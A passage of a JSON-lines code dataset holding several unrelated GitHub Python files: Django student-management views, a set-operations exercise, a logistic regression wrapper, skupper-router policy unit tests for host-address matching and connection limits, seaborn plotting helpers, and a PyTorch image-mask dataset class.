main()\n","repo_name":"VictorRodriguez/doctorado","sub_path":"detector/clustering/clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"40537644334","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.db.models import Q\nfrom django.shortcuts import render, redirect\nfrom django.template import loader\nfrom .models import Student, Division\nfrom django.http import HttpResponse\nfrom .models import Student, Division, Teacher, Subject\nfrom .forms import studentForm, teacherform, divisionform, subjectform\n\n\ndef create_student(request):\n form = studentForm()\n if request.method == 'POST':\n form = studentForm(request.POST)\n if form.is_valid():\n form.save()\n return HttpResponse('Saved the student ')\n\n context = {\n 'form': form\n }\n return render(request, 'user/create.html', context)\n\n\ndef create_teacher(request):\n form = teacherform()\n if request.method == 'POST':\n form = teacherform(request.POST)\n if form.is_valid():\n form.save()\n\n context = {\n 'form': form\n }\n return render(request, 'user/teacher.html', context)\n\n\ndef create_division(request):\n form = divisionform()\n if request.method == 'POST':\n form = divisionform(request.POST)\n if form.is_valid():\n form.save()\n\n context = {\n 'form': form\n }\n return render(request, 'user/division.html', context)\n\n\ndef create_subject(request):\n form = subjectform()\n if request.method == 'POST':\n form = subjectform(request.POST)\n if form.is_valid():\n form.save()\n return HttpResponse('Saved... ')\n\n context = {\n 'form': form\n }\n return render(request, 'user/subject.html', context)\n\n\ndef student(request):\n obj = Student.objects.all()\n context = {\n 'obj': obj\n }\n return render(request, 'user/form.html', context)\n\n\ndef get_all_students(request):\n query = request.GET.get('q')\n print(query)\n results = Student.objects.filter(name=query)\n student_in_div = Student.objects.filter(division__name='3A')\n print(student_in_div)\n for result in results:\n stud_sub = Student.objects.filter(division__teacher__subject__name=result.division.teacher.subject.name)\n print(stud_sub)\n context = {\n 'results': results\n }\n return render(request, 'user/get.html', context)\n","repo_name":"Jishin4477/django-app","sub_path":"studentapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"8463367459","text":"'''\r\n\r\n>>> H = set(\"Hacker\")\r\n>>> R = set(\"Rank\")\r\n>>> H.update(R)\r\n>>> print H\r\nset(['a', 'c', 'e', 'H', 'k', 'n', 'r', 'R'])\r\n\r\n>>> H = set(\"Hacker\")\r\n>>> R = set(\"Rank\")\r\n>>> H.intersection_update(R)\r\n>>> print H\r\nset(['a', 'k'])\r\n\r\n>>> H = set(\"Hacker\")\r\n>>> R = set(\"Rank\")\r\n>>> H.difference_update(R)\r\n>>> print H\r\nset(['c', 'e', 'H', 'r'])\r\n\r\n>>> H = set(\"Hacker\")\r\n>>> R = set(\"Rank\")\r\n>>> H.symmetric_difference_update(R)\r\n>>> print H\r\nset(['c', 'e', 'H', 'n', 'r', 'R'])\r\n\r\n'''\r\n\r\nA = set()\r\n\r\nn = int(input('Enter Length of set A: '))\r\n\r\nfor i in range(n):\r\n inpt = int(input('Enter number in Set A: '))\r\n A.add(inpt)\r\n\r\nprint(A)\r\nN = int(input('Enter number of operations: '))\r\n\r\nfor op in range(N):\r\n S = set()\r\n oper = input('Enter name of operation {}: '.format(op+1))\r\n m = int(input('Enter Length of Set S: '))\r\n\r\n for i in range(m):\r\n inpt = int(input('Enter number in Set S: '))\r\n S.add(inpt)\r\n\r\n if oper == 'update':\r\n A.update(S)\r\n print('A:')\r\n print(A)\r\n elif oper == 'intersection_update':\r\n A.intersection_update(S)\r\n print('A:')\r\n print(A)\r\n elif oper == 'difference_update':\r\n A.difference_update(S)\r\n print('A:')\r\n print(A)\r\n elif oper == 'symmetric_difference_update':\r\n A.symmetric_difference_update(S)\r\n print('A:')\r\n print(A)\r\n","repo_name":"Raizadaaditya/Atom_Programs","sub_path":"set_update_operations.py","file_name":"set_update_operations.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"28865893039","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.linear_model import LogisticRegression\n\n# import numpy as np\n\n\nclass LinearModels:\n def __init__(self, verbose=False):\n self.verbose = verbose\n\n def define_clf(self, clf_type=\"lr\"):\n \"\"\"\n Define a logisitic regression model.\n\n Parameters\n ----------\n clf_type : str, optional\n _description_, by default \"lr\"\n\n Returns\n -------\n _type_\n _description_\n \"\"\"\n if clf_type == \"lr\":\n clf_lr = LogisticRegression()\n return clf_lr\n\n def logistic_regr(self, design_matrix, response):\n \"\"\"\n Fit a logistic regression model to data.\n\n Parameters\n ----------\n design_matrix : DataFrame\n _description_\n response : Vector\n the outcome of interest\n\n Returns\n -------\n Logistic Regression (sklearn)\n _description_\n \"\"\"\n clf_lr = self.define_clf()\n clf_lr.fit(X=design_matrix, y=response)\n return clf_lr\n\n def get_wgts(self, model_object):\n \"\"\"\n Generate bias and weights (coefficients) from a linear model.\n\n Parameters\n ----------\n model_object : Logistic Regression (sklearn)\n _description_\n\n Returns\n -------\n DataFrame\n _description_\n \"\"\"\n # intercept = model_object.intercept_\n bias = model_object.intercept_\n wgts = model_object.coef_\n bias_tbl = pd.DataFrame(bias, columns=[\"bias\"])\n wgts_tbl = pd.DataFrame(wgts, columns=model_object.feature_names_in_)\n\n return pd.concat([bias_tbl, wgts_tbl], axis=1)\n\n def make_random_sample_test(self, data_object, nbr_sample=2):\n tmp_sample = data_object.sample(n=nbr_sample).reset_index(drop=True)\n # tmp_sample_answer = tmp_sample[\"home_team_wins\"]\n return tmp_sample\n\n def make_inference(self, model_object, data_object):\n \"\"\"\n Produce estimates for data.\n\n Parameters\n ----------\n model_object : Logistic Regression (sklearn)\n _description_\n data_object : DataFrame or array-like object\n _description_\n\n Returns\n -------\n Dict\n Contains the following:\n 1. predicted class --> array\n 2. predicted probabilities --> array\n 3. standard deviation of the predicted probabilities --> array\n 4. absolute difference of the predicted probabilities --> array\n\n Notes\n -----\n Calculating and returning the standard deviation and absolute difference of the\n predicted probabilities allows for further underestanding of the models decision\n boundary.\n \"\"\"\n pred_cls = model_object.predict(data_object)\n pred_probs = model_object.predict_proba(data_object)\n\n std_diff = np.std(pred_probs, axis=1)\n abs_diff = np.abs(np.diff(pred_probs, axis=1))\n abs_diff = abs_diff.reshape(std_diff.shape)\n\n infer_dt = {\n \"pred_cls\": pred_cls,\n \"pred_probs\": pred_probs,\n \"std_diff\": std_diff,\n \"abs_diff\": abs_diff,\n }\n\n return infer_dt\n","repo_name":"jonathanharmitage/nflMatchupPredictor","sub_path":"nflMatchupPredictor/Models/LinearModels.py","file_name":"LinearModels.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"19898455238","text":"import json\nfrom typing import TYPE_CHECKING, Any\n\nfrom skupper_router_internal.policy.policy_util import HostAddr, is_ipv6_enabled\nfrom skupper_router_internal.policy.policy_util import HostStruct\nfrom skupper_router_internal.policy.policy_util import PolicyError\nfrom skupper_router_internal.policy.policy_util import PolicyAppConnectionMgr\nfrom skupper_router_internal.policy.policy_local import PolicyLocal\n\nfrom system_test import unittest\nfrom system_test import TestCase, main_module\n\nif TYPE_CHECKING:\n from skupper_router_internal.policy.policy_local import AppStats\n\n\nclass PolicyHostAddrTest(TestCase):\n\n def expect_deny(self, badhostname, msg):\n denied = False\n try:\n xxx = HostStruct(badhostname)\n except PolicyError:\n denied = True\n self.assertTrue(denied, (\"%s\" % msg))\n\n def check_hostaddr_match(self, tHostAddr, tString, expectOk=True):\n # check that the string is a match for the addr\n # check that the internal struct version matches, too\n ha = HostStruct(tString)\n if expectOk:\n self.assertTrue(tHostAddr.match_str(tString))\n self.assertTrue(tHostAddr.match_bin(ha))\n else:\n self.assertFalse(tHostAddr.match_str(tString))\n self.assertFalse(tHostAddr.match_bin(ha))\n\n def test_policy_hostaddr_ipv4(self):\n # Create simple host and range\n aaa = HostAddr(\"192.168.1.1\")\n bbb = HostAddr(\"1.1.1.1,1.1.1.255\")\n # Verify host and range\n self.check_hostaddr_match(aaa, \"192.168.1.1\")\n self.check_hostaddr_match(aaa, \"1.1.1.1\", False)\n self.check_hostaddr_match(aaa, \"192.168.1.2\", False)\n self.check_hostaddr_match(bbb, \"1.1.1.1\")\n self.check_hostaddr_match(bbb, \"1.1.1.254\")\n self.check_hostaddr_match(bbb, \"1.1.1.0\", False)\n self.check_hostaddr_match(bbb, \"1.1.2.0\", False)\n\n def test_policy_hostaddr_ipv6(self):\n if not is_ipv6_enabled():\n self.skipTest(\"System IPv6 support is not available\")\n # Create simple host and range\n aaa = HostAddr(\"::1\")\n bbb = HostAddr(\"::1,::ffff\")\n ccc = HostAddr(\"ffff::0,ffff:ffff::0\")\n # Verify host and range\n self.check_hostaddr_match(aaa, \"::1\")\n self.check_hostaddr_match(aaa, \"::2\", False)\n self.check_hostaddr_match(aaa, \"ffff:ffff::0\", False)\n self.check_hostaddr_match(bbb, \"::1\")\n self.check_hostaddr_match(bbb, \"::fffe\")\n self.check_hostaddr_match(bbb, \"::1:0\", False)\n self.check_hostaddr_match(bbb, \"ffff::0\", False)\n self.check_hostaddr_match(ccc, \"ffff::1\")\n self.check_hostaddr_match(ccc, \"ffff:fffe:ffff:ffff::ffff\")\n self.check_hostaddr_match(ccc, \"ffff:ffff::1\", False)\n self.check_hostaddr_match(ccc, \"ffff:ffff:ffff:ffff::ffff\", False)\n\n def test_policy_hostaddr_ipv4_wildcard(self):\n aaa = HostAddr(\"*\")\n self.check_hostaddr_match(aaa, \"0.0.0.0\")\n self.check_hostaddr_match(aaa, \"127.0.0.1\")\n self.check_hostaddr_match(aaa, \"255.254.253.252\")\n\n def test_policy_hostaddr_ipv6_wildcard(self):\n if not is_ipv6_enabled():\n self.skipTest(\"System IPv6 support is not available\")\n aaa = HostAddr(\"*\")\n self.check_hostaddr_match(aaa, \"::0\")\n self.check_hostaddr_match(aaa, \"::1\")\n self.check_hostaddr_match(aaa, \"ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff\")\n\n def test_policy_malformed_hostaddr_ipv4(self):\n self.expect_deny(\"0.0.0.0.0\", \"Name or service not known\")\n self.expect_deny(\"1.1.1.1,2.2.2.2,3.3.3.3\", \"arg count\")\n self.expect_deny(\"9.9.9.9,8.8.8.8\", \"a > b\")\n\n def test_policy_malformed_hostaddr_ipv6(self):\n if not is_ipv6_enabled():\n self.skipTest(\"System IPv6 support is not 
available\")\n self.expect_deny(\"1::2::3\", \"Name or service not known\")\n self.expect_deny(\"::1,::2,::3\", \"arg count\")\n self.expect_deny(\"0:ff:0,0:fe:ffff:ffff::0\", \"a > b\")\n\n\nclass QpidDispatch:\n def qd_dispatch_policy_c_counts_alloc(self):\n return 100\n\n def qd_dispatch_policy_c_counts_refresh(self, cstats, entitymap):\n pass\n\n\nclass MockAgent:\n def __init__(self) -> None:\n self.qd = QpidDispatch()\n\n def add_implementation(self, entity: 'AppStats', cfg_obj_name: str) -> None:\n pass\n\n\nclass MockPolicyManager:\n def __init__(self):\n self.agent = MockAgent()\n self.logs = []\n\n def log_debug(self, text):\n print(\"DEBUG: %s\" % text)\n self.logs.append(text)\n\n def log_info(self, text):\n print(\"INFO: %s\" % text)\n self.logs.append(text)\n\n def log_trace(self, text):\n print(\"TRACE: %s\" % text)\n self.logs.append(text)\n\n def log_error(self, text):\n print(\"ERROR: %s\" % text)\n self.logs.append(text)\n\n def log_warning(self, text):\n print(\"WARNING: %s\" % text)\n self.logs.append(text)\n\n def get_agent(self):\n return self.agent\n\n\nclass PolicyFile(TestCase):\n\n manager: Any = MockPolicyManager()\n policy = PolicyLocal(manager)\n policy.test_load_config()\n\n def test_policy1_test_zeke_ok(self):\n p1 = PolicyFile.policy.lookup_user('zeke', '192.168.100.5', 'photoserver', '192.168.100.5:33333', 1)\n self.assertEqual(p1, 'test')\n upolicy = {}\n self.assertTrue(\n PolicyFile.policy.lookup_settings('photoserver', p1, upolicy)\n )\n self.assertTrue(upolicy['maxFrameSize'] == 444444)\n self.assertTrue(upolicy['maxMessageSize'] == 444444)\n self.assertTrue(upolicy['maxSessionWindow'] == 444444)\n self.assertTrue(upolicy['maxSessions'] == 4)\n self.assertTrue(upolicy['maxSenders'] == 44)\n self.assertTrue(upolicy['maxReceivers'] == 44)\n self.assertTrue(upolicy['allowAnonymousSender'])\n self.assertTrue(upolicy['allowDynamicSource'])\n self.assertTrue(upolicy['targets'] == 'a,private,')\n self.assertTrue(upolicy['sources'] == 'a,private,')\n\n def test_policy1_test_zeke_bad_IP(self):\n self.assertTrue(\n PolicyFile.policy.lookup_user('zeke', '10.18.0.1', 'photoserver', \"connid\", 2) == '')\n self.assertTrue(\n PolicyFile.policy.lookup_user('zeke', '72.135.2.9', 'photoserver', \"connid\", 3) == '')\n self.assertTrue(\n PolicyFile.policy.lookup_user('zeke', '127.0.0.1', 'photoserver', \"connid\", 4) == '')\n\n def test_policy1_test_zeke_bad_app(self):\n self.assertTrue(\n PolicyFile.policy.lookup_user('zeke', '192.168.100.5', 'galleria', \"connid\", 5) == '')\n\n def test_policy1_test_users_same_permissions(self):\n zname = PolicyFile.policy.lookup_user('zeke', '192.168.100.5', 'photoserver', '192.168.100.5:33333', 6)\n yname = PolicyFile.policy.lookup_user('ynot', '10.48.255.254', 'photoserver', '192.168.100.5:33334', 7)\n self.assertTrue(zname == yname)\n\n def test_policy1_lookup_unknown_application(self):\n upolicy = {}\n self.assertFalse(\n PolicyFile.policy.lookup_settings('unknown', 'doesntmatter', upolicy)\n )\n\n def test_policy1_lookup_unknown_usergroup(self):\n upolicy = {}\n self.assertFalse(\n PolicyFile.policy.lookup_settings('photoserver', 'unknown', upolicy)\n )\n\n\nclass PolicyFileApplicationFallback(TestCase):\n manager: Any = MockPolicyManager()\n policy = PolicyLocal(manager)\n policy.test_load_config()\n\n def test_bad_app_fallback(self):\n # Show that with no fallback the user cannot connect\n self.assertTrue(\n self.policy.lookup_user('zeke', '192.168.100.5', 'galleria', \"connid\", 5) == '')\n\n # Enable the fallback 
defaultVhost and show the same user can now connect\n self.policy.set_default_vhost('photoserver')\n settingsname = self.policy.lookup_user('zeke', '192.168.100.5', 'galleria', \"connid\", 5)\n self.assertTrue(settingsname == 'test')\n\n # Show that the fallback settings are returned\n upolicy = {}\n self.assertTrue(\n self.policy.lookup_settings('phony*app*name', settingsname, upolicy)\n )\n self.assertTrue(upolicy['maxFrameSize'] == 444444)\n self.assertTrue(upolicy['maxMessageSize'] == 444444)\n self.assertTrue(upolicy['maxSessionWindow'] == 444444)\n self.assertTrue(upolicy['maxSessions'] == 4)\n self.assertTrue(upolicy['maxSenders'] == 44)\n self.assertTrue(upolicy['maxReceivers'] == 44)\n self.assertTrue(upolicy['allowAnonymousSender'])\n self.assertTrue(upolicy['allowDynamicSource'])\n self.assertTrue(upolicy['targets'] == 'a,private,')\n self.assertTrue(upolicy['sources'] == 'a,private,')\n\n # Disable fallback and show failure again\n self.policy.set_default_vhost('')\n self.assertTrue(\n self.policy.lookup_user('zeke', '192.168.100.5', 'galleria', \"connid\", 5) == '')\n\n\nclass PolicyAppConnectionMgrTests(TestCase):\n\n def test_policy_app_conn_mgr_fail_by_total(self):\n stats = PolicyAppConnectionMgr(1, 2, 2)\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))\n self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))\n self.assertTrue(len(diags) == 1)\n self.assertIn('application connection limit', diags[0])\n\n def test_policy_app_conn_mgr_fail_by_user(self):\n stats = PolicyAppConnectionMgr(3, 1, 2)\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))\n self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))\n self.assertTrue(len(diags) == 1)\n self.assertIn('per user', diags[0])\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10002', 'chuck', '10.10.10.10', diags, 2, None))\n self.assertFalse(stats.can_connect('10.10.10.10:10003', 'chuck', '10.10.10.10', diags, 2, None))\n\n def test_policy_app_conn_mgr_fail_by_hosts(self):\n stats = PolicyAppConnectionMgr(3, 2, 1)\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))\n self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))\n self.assertTrue(len(diags) == 1)\n self.assertIn('per host', diags[0])\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10002', 'chuck', '10.10.10.10', diags, None, 2))\n self.assertFalse(stats.can_connect('10.10.10.10:10003', 'chuck', '10.10.10.10', diags, None, 2))\n\n def test_policy_app_conn_mgr_fail_by_user_hosts(self):\n stats = PolicyAppConnectionMgr(3, 1, 1)\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))\n self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))\n self.assertTrue(len(diags) == 2)\n success = 'per user' in diags[0] or 'per user' in diags[1]\n self.assertTrue(success)\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10002', 'chuck', '10.10.10.10', diags, 2, 2))\n self.assertFalse(stats.can_connect('10.10.10.10:10003', 'chuck', '10.10.10.10', diags, 2, 2))\n\n def test_policy_app_conn_mgr_update(self):\n stats = PolicyAppConnectionMgr(3, 1, 2)\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', 
'10.10.10.10', diags, None, None))\n self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))\n self.assertTrue(len(diags) == 1)\n self.assertIn('per user', diags[0])\n diags = []\n stats.update(3, 2, 2)\n self.assertTrue(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))\n\n def test_policy_app_conn_mgr_disconnect(self):\n stats = PolicyAppConnectionMgr(3, 1, 2)\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))\n self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))\n self.assertTrue(len(diags) == 1)\n self.assertIn('per user', diags[0])\n diags = []\n stats.disconnect(\"10.10.10.10:10000\", 'chuck', '10.10.10.10')\n self.assertTrue(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))\n\n def test_policy_app_conn_mgr_create_bad_settings(self):\n denied = False\n try:\n stats = PolicyAppConnectionMgr(-3, 1, 2)\n except PolicyError:\n denied = True\n self.assertTrue(denied, \"Failed to detect negative setting value.\")\n\n def test_policy_app_conn_mgr_update_bad_settings(self):\n denied = False\n try:\n stats = PolicyAppConnectionMgr(0, 0, 0)\n except PolicyError:\n denied = True\n self.assertFalse(denied, \"Should allow all zeros.\")\n try:\n stats.update(0, -1, 0)\n except PolicyError:\n denied = True\n self.assertTrue(denied, \"Failed to detect negative setting value.\")\n\n def test_policy_app_conn_mgr_larger_counts(self):\n stats = PolicyAppConnectionMgr(10000, 10000, 10000)\n diags = []\n for i in range(0, 10000):\n self.assertTrue(stats.can_connect('1.1.1.1:' + str(i), 'chuck', '1.1.1.1', diags, None, None))\n self.assertTrue(len(diags) == 0)\n self.assertFalse(stats.can_connect('1.1.1.1:10000', 'chuck', '1.1.1.1', diags, None, None))\n self.assertTrue(len(diags) == 3)\n self.assertTrue(stats.connections_active == 10000)\n self.assertTrue(stats.connections_approved == 10000)\n self.assertTrue(stats.connections_denied == 1)\n\n\nclass PolicyAliases(TestCase):\n\n #\n def test_AliasesRenameOwnVhost(self):\n config_str = \"\"\"\n[{\n \"hostname\": \"$default\",\n \"allowUnknownUser\": true,\n \"aliases\": \"$default\",\n \"groups\": {\n \"$default\": {\n \"remoteHosts\": \"*\",\n \"allowDynamicSource\": true,\n \"allowAnonymousSender\": true,\n \"sources\": \"$management, examples, q1\",\n \"targets\": \"$management, examples, q1\",\n \"maxSessions\": 1\n }\n }\n}]\n\"\"\"\n manager: Any = MockPolicyManager()\n policy = PolicyLocal(manager)\n ruleset = json.loads(config_str)\n denied = False\n try:\n policy.create_ruleset(ruleset[0])\n except PolicyError:\n denied = True\n self.assertTrue(denied, \"Ruleset duplicates vhost and alias but condition not detected.\")\n\n #\n def test_SameAliasOnTwoVhosts(self):\n config_str = \"\"\"\n[{\n \"hostname\": \"$default\",\n \"aliases\": \"a,b,c,d,e\",\n \"groups\": {\n \"$default\": {\n \"maxSessions\": 1\n }\n }\n},\n{\n \"hostname\": \"doshormigas\",\n \"aliases\": \"i,h,g,f,e\",\n \"groups\": {\n \"$default\": {\n \"maxSessions\": 1\n }\n }\n}]\n\"\"\"\n manager: Any = MockPolicyManager()\n policy = PolicyLocal(manager)\n ruleset = json.loads(config_str)\n denied = False\n try:\n policy.create_ruleset(ruleset[0])\n policy.create_ruleset(ruleset[1])\n except PolicyError as e:\n denied = True\n self.assertTrue(denied, \"Rulesets duplicate same alias in two vhosts but condition not detected.\")\n\n #\n def 
test_AliasConflictsWithVhost(self):\n config_str = \"\"\"\n[{\n \"hostname\": \"$default\",\n \"groups\": {\n \"$default\": {\n \"maxSessions\": 1\n }\n }\n},\n{\n \"hostname\": \"conflict-with-vhost\",\n \"aliases\": \"$default\",\n \"groups\": {\n \"$default\": {\n \"maxSessions\": 1\n }\n }\n}]\n\"\"\"\n manager: Any = MockPolicyManager()\n policy = PolicyLocal(manager)\n ruleset = json.loads(config_str)\n denied = False\n try:\n policy.create_ruleset(ruleset[0])\n policy.create_ruleset(ruleset[1])\n except PolicyError as e:\n denied = True\n self.assertTrue(denied, \"Ruleset alias names other vhost but condition not detected.\")\n\n #\n def test_AliasOperationalLookup(self):\n manager: Any = MockPolicyManager()\n policy = PolicyLocal(manager)\n policy.test_load_config()\n\n # For this test the test config defines vhost 'photoserver'.\n # This test accesses that vhost using the alias name 'antialias'.\n settingsname = policy.lookup_user('zeke', '192.168.100.5', 'antialias', \"connid\", 5)\n self.assertTrue(settingsname == 'test')\n\n upolicy = {}\n self.assertTrue(\n policy.lookup_settings('antialias', settingsname, upolicy)\n )\n self.assertTrue(upolicy['maxFrameSize'] == 444444)\n self.assertTrue(upolicy['sources'] == 'a,private,')\n\n\nif __name__ == '__main__':\n unittest.main(main_module())\n","repo_name":"skupperproject/skupper-router","sub_path":"tests/router_policy_test.py","file_name":"router_policy_test.py","file_ext":"py","file_size_in_byte":17174,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"32"}
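# The PolicyAppConnectionMgr tests in the record above all follow one pattern: build the
# manager with (max_total, max_per_user, max_per_host) caps, then check that can_connect()
# admits connections until a cap is hit and appends one diagnostic per violated limit.
# A minimal sketch of that counting logic (hypothetical ConnLimiter class, not the
# router's actual implementation):

from collections import defaultdict

class ConnLimiter:
    def __init__(self, max_total, max_user, max_host):
        if min(max_total, max_user, max_host) < 0:
            raise ValueError("limits must be non-negative")
        self.max_total, self.max_user, self.max_host = max_total, max_user, max_host
        self.total = 0
        self.per_user = defaultdict(int)
        self.per_host = defaultdict(int)

    def can_connect(self, user, host, diags):
        ok = True
        if self.total + 1 > self.max_total:
            diags.append("application connection limit"); ok = False
        if self.per_user[user] + 1 > self.max_user:
            diags.append("per user connection limit"); ok = False
        if self.per_host[host] + 1 > self.max_host:
            diags.append("per host connection limit"); ok = False
        if ok:
            self.total += 1; self.per_user[user] += 1; self.per_host[host] += 1
        return ok

# ConnLimiter(1, 2, 2) admits one connection for 'chuck' and refuses the second with a
# single "application connection limit" diagnostic, mirroring
# test_policy_app_conn_mgr_fail_by_total above.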
+{"seq_id":"35866152579","text":"import seaborn as sns\nimport matplotlib.pyplot as plt\nfrom typing import List, Tuple, Any, Counter as CounterT\nfrom collections import Counter\nimport toolz.curried as toolz\n\nfrom src.parsing.songs import parse_tracks\nfrom src.IO.genre_io import all_genres\n\n\ndef plot_years(counter: CounterT[int]) -> None:\n breakdown = {\n \"Year\": list(counter.keys()),\n \"Number of songs\": list(counter.values()),\n }\n\n sns.set_theme()\n axes = sns.barplot(\n data=breakdown,\n x=\"Year\",\n y=\"Number of songs\",\n )\n axes.set_title(\"Songs per year\")\n plt.show()\n\n\n# Show a bar plot of the number of tracks added to the playlist per year\nplot_songs_per_year = toolz.compose(\n plot_years, Counter, list, parse_tracks)\n\n\n@toolz.curry\ndef occurs_more_than(min: int, counter: Counter) -> dict:\n return toolz.valfilter(lambda x: x > min, counter)\n\n\ndef sort_counter(counter: Counter) -> List[Tuple[Any, int]]:\n return sorted(counter.items(), key=lambda pair: pair[1], reverse=True)\n\n\ndef plot_genres(sorted_counter: List[Tuple[str, int]]) -> None:\n breakdown = {\n \"Genre\": list(map(toolz.get(0), sorted_counter)),\n \"Occurences\": list(map(toolz.get(1), sorted_counter)),\n }\n sns.set_theme()\n axes = sns.barplot(\n data=breakdown,\n x=\"Genre\",\n y=\"Occurences\",\n )\n axes.set_title(\"Most common genres\")\n plt.show()\n\n\n# Show a bar plot of the number of songs per genre in the playlist\nplot_songs_per_genre = toolz.compose(\n plot_genres,\n sort_counter,\n occurs_more_than(10),\n Counter,\n list\n)\n","repo_name":"SMC242/spotify-wrapped-playlist","sub_path":"src/formatting/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"70411709533","text":"from torch.utils.data import Dataset\nfrom torchvision.transforms.transforms import ToTensor\nimport torch\n\nimport albumentations as A\n\nimport numpy as np\n\nfrom PIL import Image\nimport cv2 as cv\n\nfrom typing import Dict, Optional, Union, List\nimport os\nimport json\n\nimport logging\n\nfrom .aug_tools import *\n\n__all__ = [\n \"cfg2datasets\",\n \"ImgMaskSet\",\n \"datasets2json_file\"\n]\n\n# Here implemented 'fit' that trains model.\n\nlog = logging.getLogger(__name__)\nimg2tensor = ToTensor()\n\n\nclass ImgMaskSet(Dataset):\n \"\"\"\n It's dataset that returns images, their masks and names. As well, it can return not transformed img.\n In img and mask dirs imgs and corresponding masks should be named the same.\n fgr and bgr trfms have not to change mask (it's can not be a flip, for instance)\n \"\"\"\n def __init__(self, log_name: str, img_dir_path: str, mask_dir_path: str, img_list: List[str],\n bgr_trfm, fgr_trfm, trfm, preproc, # add type of augmentation\n device: torch.device,):\n \"\"\"\n :param log_name: name that is used in log\n\n :param img_dir_path: path to directory where images are contained. in this directory all images are .jpeg\n :param mask_dir_path: path to directory where masks (images with deleted background) are contained.\n in this directory all images are .png\n :param img_list: specifies image names in image directory that should be used\n\n :param bgr_trfm: transformation of background, is not used during the test\n :param fgr_trfm: foreground augmentations, is not used during the test\n :param trfm: transformations to augment dataset, is not used during the test\n :param preproc: transformations that used during the test, it is applied after all other transformations\n\n :param device: device of images and masks\n \"\"\"\n\n self.log_name = log_name\n\n self.img_dir_path = img_dir_path\n self.mask_dir_path = mask_dir_path\n self.device = device\n\n self.img_list = [i[:-5] for i in img_list] # deleted extension .jpeg\n self.size = len(self.img_list)\n\n # augmentation\n self.bgr_trfm = bgr_trfm\n self.fgr_trfm = fgr_trfm\n self.trfm = trfm\n self.aug_flag = True # applying of augmentation depends on it\n\n # preprocessing\n self.preproc = preproc\n self.preproc_flag = True # applying of preprocessing depends on it\n\n # needed to return img in it original form, without preproc and augmentation\n self.return_original_img = False\n\n log.info(f\"Created {self.log_name} dataset: \\n\"\n f\"Size: {self.size} \\n\"\n f\"Device: {self.device} \\n\"\n f\"Path to image dir: {self.img_dir_path} \\n\"\n f\"Path to mask dir: {self.mask_dir_path}\")\n\n def __len__(self):\n return self.size\n\n def __getitem__(self, idx: int):\n\n img_name = self.img_list[idx]\n img_path = os.path.join(self.img_dir_path, img_name + \".jpeg\")\n mask_path = os.path.join(self.mask_dir_path, img_name + \".png\")\n\n # read img and mask\n original_img = cv.imread(img_path)\n if original_img is None:\n msg = f\"Wrong reading image {img_path}\"\n log.critical(msg)\n raise Exception(msg)\n\n original_img = cv.cvtColor(original_img, cv.COLOR_BGR2RGB) # convert to RGB format\n img = original_img.copy()\n\n with Image.open(mask_path) as mask_im:\n mask = np.array(mask_im.split()[-1]) # retrieve transparent mask\n\n # apply transformations\n if self.aug_flag:\n img, mask = self.apply_aug(img, mask)\n if self.preproc_flag:\n img, mask = self.apply_preproc(img, mask)\n\n # convert to tensor and transfer to device\n img_tensor = 
img2tensor(img).to(torch.float32).to(self.device)\n mask_tensor = img2tensor(mask).to(torch.float32).to(self.device)\n\n # return original image if it's needed\n if self.return_original_img:\n original_img = img2tensor(original_img).to(self.device)\n return img_name, img_tensor, mask_tensor, original_img\n else:\n return img_name, img_tensor, mask_tensor\n\n def apply_aug(self, img, mask):\n trfmd_bgr = self.bgr_trfm(image=img, mask=mask)[\"image\"]\n trfmd_fgr = self.fgr_trfm(image=img, mask=mask)[\"image\"]\n mask = mask.reshape([330, 330, 1])\n img = (trfmd_fgr * mask + trfmd_bgr * (1 - mask)).astype(\"uint8\")\n\n augmented = self.trfm(image=img, mask=mask)\n return augmented[\"image\"], augmented[\"mask\"]\n\n def apply_preproc(self, img, mask):\n preprocessed = self.preproc(image=img, mask=mask)\n return preprocessed[\"image\"], preprocessed[\"mask\"]\n\n def get_img_list(self):\n return [f\"{i}.jpeg\" for i in self.img_list]\n\n def img_list2file(self, path: str):\n with open(os.path.join(path, f\"{self.log_name}_dataset.json\"), \"w\") as fp:\n json.dump(\n {\n \"img_dir\": 